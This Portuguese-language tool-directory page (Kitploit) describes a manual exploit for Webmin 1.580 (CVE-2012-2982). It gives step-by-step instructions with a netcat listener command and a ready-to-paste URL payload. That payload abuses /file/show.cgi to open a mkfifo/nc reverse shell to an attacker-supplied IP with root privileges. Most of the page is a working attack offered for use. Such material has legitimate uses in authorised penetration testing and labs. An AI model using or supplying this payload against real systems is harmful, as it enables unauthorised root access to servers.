Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit- — Exploit manual e autenticado de Execução Remota de Código (RCE), sem Metasploit, via barra de URL do navegador para Webmin 1.580 (CVE-2012-2982) | Kitploit
Ferramentas/GitHubGitHub/marinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubmarinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-

Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit-

Exploit manual e autenticado de Execução Remota de Código (RCE), sem Metasploit, via barra de URL do navegador para Webmin 1.580 (CVE-2012-2982)

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Guia de Execução de RCE no Webmin 1.580

Referência rápida para executar Remote Code Execution (RCE) autenticado no Webmin 1.580 por meio do componente /file/show.cgi.


1. Máquina do Atacante (Listener)

Execute este comando na sua máquina local para capturar a conexão de entrada antes de executar o payload:

root@kitploit:~
rlwrap nc -lnvp 4444
  1. Payload de Exploração do Alvo Cole a seguinte URL diretamente na barra de endereços do seu navegador (certifique-se de que você já está logado no painel do Webmin):
root@kitploit:~
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Screenshot 2026-05-25 220641

Nota: Lembre-se de substituir <YOUR_ATTACK_IP> pelo seu endereço IP local ou de túnel real, TAMBÉM o IP e a PORTA do alvo. Screenshot 2026-05-25 220708

Contexto e Detalhes

  • Vulnerabilidade: Saneamento insuficiente das informações de caminho inline passadas para a função interna open() do Perl em /file/show.cgi. Anexar o caractere pipe (|) permite a execução arbitrária de comandos com privilégios de root.
  • Autenticação: Isso requer uma sessão ativa. O navegador lida automaticamente com a autenticação enviando seus cookies de sessão ativa quando você envia o payload da URL.
  • Comportamento Esperado: Após pressionar Enter, a guia do navegador ficará girando e parecerá travada indefinidamente. Isso confirma que a thread do servidor foi sequestrada com sucesso para manter a sessão interativa de shell.
Baixar ferramenta